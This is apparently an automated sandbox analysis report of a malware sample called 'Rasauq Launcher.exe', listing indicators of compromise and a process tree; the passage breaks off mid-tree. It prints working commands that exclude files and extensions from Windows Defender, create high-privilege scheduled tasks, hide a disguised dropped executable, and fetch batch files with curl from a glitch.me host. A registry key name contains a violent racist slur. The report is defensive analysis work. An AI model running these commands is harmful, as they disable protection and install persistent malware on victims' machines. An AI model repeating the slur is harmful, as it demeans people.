Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe

Delays execution with timeout.exe 4 IoCs

pid	Process
3672	timeout.exe
6812	Process not Found
3088	timeout.exe
4828	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 37 IoCs

pid	Process
3168	taskkill.exe
5744	taskkill.exe
672	taskkill.exe
5608	taskkill.exe
124	taskkill.exe
2800	taskkill.exe
5044	taskkill.exe
4824	taskkill.exe
4168	taskkill.exe
3276	taskkill.exe
4004	taskkill.exe
244	taskkill.exe
2256	taskkill.exe
4516	taskkill.exe
4660	taskkill.exe
1980	taskkill.exe
6108	taskkill.exe
4408	taskkill.exe
4688	taskkill.exe
6160	Process not Found
4168	taskkill.exe
4492	taskkill.exe
980	taskkill.exe
1856	taskkill.exe
300	taskkill.exe
5236	taskkill.exe
2128	taskkill.exe
4100	taskkill.exe
3480	taskkill.exe
5720	taskkill.exe
4292	taskkill.exe
5320	taskkill.exe
4628	taskkill.exe
3080	taskkill.exe
6024	taskkill.exe
3376	taskkill.exe
2228	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe

Modifies registry class 28 IoCs

description	ioc	Process
Key created	\Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Key created	\Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3920535620-1286624088-2946613906-1000\{764A2F7D-8884-4AA4-911E-3CA6BCECFEDC}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3920535620-1286624088-2946613906-1000\{A04EEBD0-CA44-4981-A1D8-AAABB563520F}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5908	schtasks.exe
1252	schtasks.exe
3632	schtasks.exe
2672	schtasks.exe
3168	schtasks.exe
5384	Process not Found

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
1960	powershell.exe
5808	powershell.exe
1960	powershell.exe
5808	powershell.exe
1696	powershell.exe
1860	powershell.exe
1696	powershell.exe
1860	powershell.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
6020	sRasauq SoftWorks.exe
5600	powershell.exe
5600	powershell.exe
4544	powershell.exe
4544	powershell.exe
1372	powershell.exe
1372	powershell.exe
1252	powershell.exe
5572	powershell.exe
1252	powershell.exe
5572	powershell.exe
1444	powershell.exe
1444	powershell.exe
3788	powershell.exe
3788	powershell.exe
3848	powershell.exe
3848	powershell.exe
1968	powershell.exe
1968	powershell.exe
5836	powershell.exe
5836	powershell.exe
5928	powershell.exe
5928	powershell.exe
4920	powershell.exe
4920	powershell.exe
3756	powershell.exe
3756	powershell.exe
3756	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4456	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
3708	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe
4456	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1040	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	5808	powershell.exe
Token: SeDebugPrivilege	4292	taskkill.exe
Token: SeDebugPrivilege	2800	taskkill.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeBackupPrivilege	4992	vssvc.exe
Token: SeRestorePrivilege	4992	vssvc.exe
Token: SeAuditPrivilege	4992	vssvc.exe
Token: SeDebugPrivilege	6020	sRasauq SoftWorks.exe
Token: SeDebugPrivilege	5600	powershell.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	5572	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	5836	powershell.exe
Token: SeDebugPrivilege	5928	powershell.exe
Token: SeDebugPrivilege	5044	taskkill.exe
Token: SeDebugPrivilege	300	taskkill.exe
Token: SeDebugPrivilege	5236	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	1040	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	4628	taskkill.exe
Token: SeDebugPrivilege	5320	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	4168	taskkill.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	4100	taskkill.exe
Token: SeDebugPrivilege	5744	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	4492	taskkill.exe
Token: SeDebugPrivilege	4824	taskkill.exe
Token: SeDebugPrivilege	3080	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	6108	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	5608	taskkill.exe
Token: SeDebugPrivilege	6024	taskkill.exe
Token: SeDebugPrivilege	3276	taskkill.exe
Token: SeDebugPrivilege	124	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	244	taskkill.exe
Token: SeDebugPrivilege	3376	taskkill.exe
Token: SeDebugPrivilege	1856	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	3480	taskkill.exe
Token: SeDebugPrivilege	4408	taskkill.exe
Token: SeTakeOwnershipPrivilege	296	takeown.exe
Token: SeShutdownPrivilege	2272	powercfg.exe
Token: SeCreatePagefilePrivilege	2272	powercfg.exe
Token: SeShutdownPrivilege	484	powercfg.exe
Token: SeCreatePagefilePrivilege	484	powercfg.exe
Token: SeShutdownPrivilege	1972	powercfg.exe
Token: SeCreatePagefilePrivilege	1972	powercfg.exe
Token: SeShutdownPrivilege	5728	powercfg.exe
Token: SeCreatePagefilePrivilege	5728	powercfg.exe
Token: SeShutdownPrivilege	5884	powercfg.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1960	powershell.exe
5808	powershell.exe
3708	msedge.exe
3708	msedge.exe
4456	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1336 wrote to memory of 1040	1336	Rasauq Launcher.exe	84
PID 1336 wrote to memory of 1040	1336	Rasauq Launcher.exe	84
PID 1336 wrote to memory of 6020	1336	Rasauq Launcher.exe	85
PID 1336 wrote to memory of 6020	1336	Rasauq Launcher.exe	85
PID 1336 wrote to memory of 5204	1336	Rasauq Launcher.exe	86
PID 1336 wrote to memory of 5204	1336	Rasauq Launcher.exe	86
PID 5204 wrote to memory of 1072	5204	cmd.exe	88
PID 5204 wrote to memory of 1072	5204	cmd.exe	88
PID 5204 wrote to memory of 5212	5204	cmd.exe	89
PID 5204 wrote to memory of 5212	5204	cmd.exe	89
PID 5204 wrote to memory of 3976	5204	cmd.exe	90
PID 5204 wrote to memory of 3976	5204	cmd.exe	90
PID 5204 wrote to memory of 488	5204	cmd.exe	91
PID 5204 wrote to memory of 488	5204	cmd.exe	91
PID 488 wrote to memory of 2740	488	cmd.exe	94
PID 488 wrote to memory of 2740	488	cmd.exe	94
PID 3976 wrote to memory of 4504	3976	cmd.exe	95
PID 3976 wrote to memory of 4504	3976	cmd.exe	95
PID 488 wrote to memory of 1960	488	cmd.exe	96
PID 488 wrote to memory of 1960	488	cmd.exe	96
PID 3976 wrote to memory of 5808	3976	cmd.exe	97
PID 3976 wrote to memory of 5808	3976	cmd.exe	97
PID 488 wrote to memory of 3052	488	cmd.exe	98
PID 488 wrote to memory of 3052	488	cmd.exe	98
PID 3976 wrote to memory of 5892	3976	cmd.exe	99
PID 3976 wrote to memory of 5892	3976	cmd.exe	99
PID 488 wrote to memory of 4260	488	cmd.exe	199
PID 488 wrote to memory of 4260	488	cmd.exe	199
PID 488 wrote to memory of 3852	488	cmd.exe	101
PID 488 wrote to memory of 3852	488	cmd.exe	101
PID 488 wrote to memory of 4272	488	cmd.exe	102
PID 488 wrote to memory of 4272	488	cmd.exe	102
PID 3976 wrote to memory of 4268	3976	cmd.exe	103
PID 3976 wrote to memory of 4268	3976	cmd.exe	103
PID 3976 wrote to memory of 4660	3976	cmd.exe	104
PID 3976 wrote to memory of 4660	3976	cmd.exe	104
PID 488 wrote to memory of 4648	488	cmd.exe	105
PID 488 wrote to memory of 4648	488	cmd.exe	105
PID 3976 wrote to memory of 4708	3976	cmd.exe	106
PID 3976 wrote to memory of 4708	3976	cmd.exe	106
PID 488 wrote to memory of 1008	488	cmd.exe	107
PID 488 wrote to memory of 1008	488	cmd.exe	107
PID 3976 wrote to memory of 4544	3976	cmd.exe	207
PID 3976 wrote to memory of 4544	3976	cmd.exe	207
PID 488 wrote to memory of 544	488	cmd.exe	109
PID 488 wrote to memory of 544	488	cmd.exe	109
PID 3976 wrote to memory of 1372	3976	cmd.exe	209
PID 3976 wrote to memory of 1372	3976	cmd.exe	209
PID 488 wrote to memory of 5324	488	cmd.exe	111
PID 488 wrote to memory of 5324	488	cmd.exe	111
PID 3976 wrote to memory of 4036	3976	cmd.exe	112
PID 3976 wrote to memory of 4036	3976	cmd.exe	112
PID 488 wrote to memory of 5596	488	cmd.exe	113
PID 488 wrote to memory of 5596	488	cmd.exe	113
PID 3976 wrote to memory of 3328	3976	cmd.exe	114
PID 3976 wrote to memory of 3328	3976	cmd.exe	114
PID 488 wrote to memory of 4032	488	cmd.exe	115
PID 488 wrote to memory of 4032	488	cmd.exe	115
PID 3976 wrote to memory of 4688	3976	cmd.exe	116
PID 3976 wrote to memory of 4688	3976	cmd.exe	116
PID 3976 wrote to memory of 5488	3976	cmd.exe	117
PID 3976 wrote to memory of 5488	3976	cmd.exe	117
PID 3976 wrote to memory of 3160	3976	cmd.exe	118
PID 3976 wrote to memory of 3160	3976	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
1384	attrib.exe
4744	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1336
- C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3768
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3632
- C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6020
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1384
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEA02.tmp.bat""
    3⤵
    PID:5292
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3672
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
      4⤵
      Executes dropped EXE
      PID:2052
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:6072
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2672
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:4964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3756
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3168
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:5204
- - C:\Windows\system32\curl.exe
    curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:1072
- - C:\Windows\system32\curl.exe
    curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:5212
- - C:\Windows\system32\cmd.exe
